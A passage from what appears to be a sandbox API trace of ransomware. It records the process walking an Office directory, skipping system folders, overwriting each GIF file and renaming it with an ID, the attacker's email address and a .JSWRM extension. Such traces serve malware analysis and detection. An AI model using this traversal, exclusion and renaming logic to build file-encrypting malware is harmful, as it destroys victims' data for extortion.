lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.291] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a34, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR33F.GIF", cAlternateFileName="")) returned 1 [0120.291] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2=".") returned 1 [0120.291] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="..") returned 1 [0120.291] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="...") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="windows") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="recovery") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="perflogs") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="documents and settings") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="system volume information") returned 1 [0120.292] lstrcmpiW (lpString1="ZPDIR33F.GIF", lpString2="msocache") returned 1 [0120.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR33F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR33F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR33F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR33F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR33F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR33F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir33f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.293] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23092) returned 1 [0120.293] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a30) returned 0x24e1d8 [0120.293] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5a30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5a30, lpOverlapped=0x0) returned 1 [0120.322] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.322] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5a30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5a30, lpOverlapped=0x0) returned 1 [0120.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.323] CloseHandle (hObject=0x314) returned 1 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0120.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.323] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir33f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR33F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir33f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.325] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa9f0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR34F.GIF", cAlternateFileName="")) returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2=".") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="..") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="...") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="windows") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="recovery") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="perflogs") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="documents and settings") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="system volume information") returned 1 [0120.325] lstrcmpiW (lpString1="ZPDIR34F.GIF", lpString2="msocache") returned 1 [0120.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR34F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR34F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR34F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR34F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR34F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR34F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir34f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.326] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=43504) returned 1 [0120.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa9f0) returned 0x24e1d8 [0120.326] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xa9f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xa9f0, lpOverlapped=0x0) returned 1 [0120.393] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.393] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xa9f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xa9f0, lpOverlapped=0x0) returned 1 [0120.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.393] CloseHandle (hObject=0x314) returned 1 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0120.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir34f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR34F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir34f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.395] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4660, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR35F.GIF", cAlternateFileName="")) returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2=".") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="..") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="...") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="windows") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="recovery") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="perflogs") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="documents and settings") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="system volume information") returned 1 [0120.395] lstrcmpiW (lpString1="ZPDIR35F.GIF", lpString2="msocache") returned 1 [0120.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR35F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR35F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR35F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR35F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR35F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR35F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir35f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.397] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18016) returned 1 [0120.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4660) returned 0x24e1d8 [0120.397] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4660, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4660, lpOverlapped=0x0) returned 1 [0120.407] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.407] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4660, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4660, lpOverlapped=0x0) returned 1 [0120.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.407] CloseHandle (hObject=0x314) returned 1 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0120.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir35f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR35F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir35f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.409] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x875e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR36F.GIF", cAlternateFileName="")) returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2=".") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="..") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="...") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="windows") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="recovery") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="perflogs") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="documents and settings") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="system volume information") returned 1 [0120.409] lstrcmpiW (lpString1="ZPDIR36F.GIF", lpString2="msocache") returned 1 [0120.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, 